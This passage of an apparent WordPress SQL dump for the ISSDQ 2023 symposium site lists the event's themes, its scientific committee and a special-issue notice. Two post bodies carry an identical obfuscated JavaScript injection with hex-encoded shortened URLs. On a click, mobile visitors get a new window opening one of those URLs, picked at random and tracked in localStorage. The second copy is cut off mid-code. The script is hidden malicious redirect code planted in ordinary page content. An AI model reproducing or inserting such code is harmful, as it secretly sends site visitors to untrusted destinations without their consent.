issue of the journals dedicated to this symposium. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2022-10-14 16:28:26','2022-10-14 16:28:26','',2798,'https://gsw2023.com/?p=2807',0,'revision','',0),
(2808,1,'2022-10-14 16:41:30','2022-10-14 16:41:30','','Prof. Maria Antonia Brovelli, Politecnico di Milano, Italy (TC IV)','','publish','closed','closed','','prof-maria-antonia-brovelli-politecnico-di-milano-italy-tc-iv','','','2022-10-14 16:47:21','2022-10-14 16:47:21','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2808',0,'dt_team','',0),
(2809,1,'2022-10-14 16:41:24','2022-10-14 16:41:24','','w122','','inherit','open','closed','','w122','','','2022-10-14 16:41:24','2022-10-14 16:41:24','',2808,'https://gsw2023.com/wp-content/uploads/2022/10/w122.jpg',0,'attachment','image/jpeg',0),
(2810,1,'2022-10-14 16:42:43','2022-10-14 16:42:43','','Dr. Hao Wu, National Geomatics Center of China (TC IV)','','publish','closed','closed','','dr-hao-wu-national-geomatics-center-of-china-tc-iv','','','2022-10-14 16:48:30','2022-10-14 16:48:30','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2810',0,'dt_team','',0),
(2811,1,'2022-10-14 16:43:21','2022-10-14 16:43:21','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h1><strong>CHAIRES</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"48\"][/vc_column_inner][/vc_row_inner][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Spatial data quality in space and time,</strong></h6>\n</li>\n<li>\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative spatial data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\n</li>\n<li>\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\n</li>\n<li>\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\n</li>\n<li>\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\n</li>\n<li>\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\n</li>\n<li>\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality visualization</strong></h6>\n</li>\n<li>\n<h6><strong>Web GIS data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor-based data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent GIS</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\n</li>\n<li>\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\n</li>\n<li>\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\n<h6><strong>Hong Kong, China</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\n</li>\n<li>\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\n</li>\n<li>\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\n</li>\n<li>\n<h6><strong>Alexis Comber, Leeds University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\n</li>\n<li>\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\n</li>\n<li>\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\n</li>\n<li>\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\n</li>\n<li>\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img src=\"https://gsw2023.com/wp-content/uploads/2022/10/m4-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" class=\"alignnone size-medium wp-image-2805\" /></p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\n<h6 style=\"text-align:justify; color:black;\"><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the ISPRS IJGI and Geospatial information Science (GSIS) journals. The papers being accepted after the peer-review process of the journal will appear in a special issue of the journals dedicated to this symposium. </strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 